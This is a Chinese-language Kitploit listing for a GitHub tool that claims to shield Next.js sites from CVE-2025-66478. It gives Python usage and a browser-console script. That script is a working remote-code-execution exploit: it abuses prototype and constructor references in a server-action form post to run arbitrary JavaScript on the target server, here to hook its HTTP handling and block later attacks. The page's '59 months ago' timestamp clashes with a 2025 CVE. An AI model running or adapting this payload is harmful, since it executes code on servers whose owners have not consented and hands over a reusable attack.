Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-66478-kinda-waf — 让我们帮助网站保持安全,直到它们被正确修补! | Kitploit
工具/GitHubGitHub/aiexz/cve-2025-66478-kinda-waf
漏洞扫描器漏洞利用IDS/IPS规避WAF绕过Web安全渗透测试
GitHubaiexz/cve-2025-66478-kinda-waf

CVE-2025-66478-kinda-waf

让我们帮助网站保持安全,直到它们被正确修补!

查看仓库
59个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

kinda-waf

简单的临时WAF防护测试器,针对特定载荷序列。

让我们帮助网站在得到妥善修复之前保持安全!

目的

通过检测并拦截包含特定载荷签名的请求,防护CVE-2025-66478。这不会破坏合法流量,并能为那些未能得到及时维护的网站提供保护。

注意:重启后防护会重置,因此并非永久解决方案

要求

  • Python 3

用法

运行脚本(默认本地主机):

root@kitploit:~
python main.py

使用特定URL运行:

root@kitploit:~
python main.py http://example.com/

以及可在浏览器中运行的版本:

没错,直接在浏览器控制台中运行:

root@kitploit:~
const formData = new FormData();

const actionPayload = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"throw(async()=>{const t=await import(\"node:http\"),e=t.IncomingMessage.prototype.emit;t.IncomingMessage.prototype.emit=function(t,...n){if(\"data\"===t&&n.length>0){const t=this.headers[\"content-type\"]||\"\";if(t.includes(\"multipart\")||t.includes(\"json\")||t.includes(\"text\")){const t=n[0].toString(\"utf8\");if(t.includes('\"then\":\"$1:__proto__:then\"')||t.includes('\"get\":\"$1:constructor:constructor\"')){const t=this.socket._httpMessage;if(t&&!t.headersSent)try{return t.writeHead(500,{\"Content-Type\":\"text/plain; charset=utf-8\",Connection:\"close\",\"X-Powered-By\":\"Next.js\"}),t.end('0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"cwwYVM2ZWm4vgZG3xVPfk\"}\\n1:E{\"digest\":\"2494231801\"}',(()=>this.destroy())),!1}catch(t){this.destroy()}else this.destroy();return!1}}}return e.apply(this,arguments)}})(),Object.assign(new Error(\"x\"),{digest:\"WAF Installed\"});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

formData.append("0", JSON.stringify(actionPayload));
formData.append("1", '"$@0"');
formData.append("2", "[]");

fetch("/", {
  method: "POST",
  body: formData,
  headers: {
    "Next-Action": "x",
  }
})
  .then(async res => console.log(await res.text()));
下载工具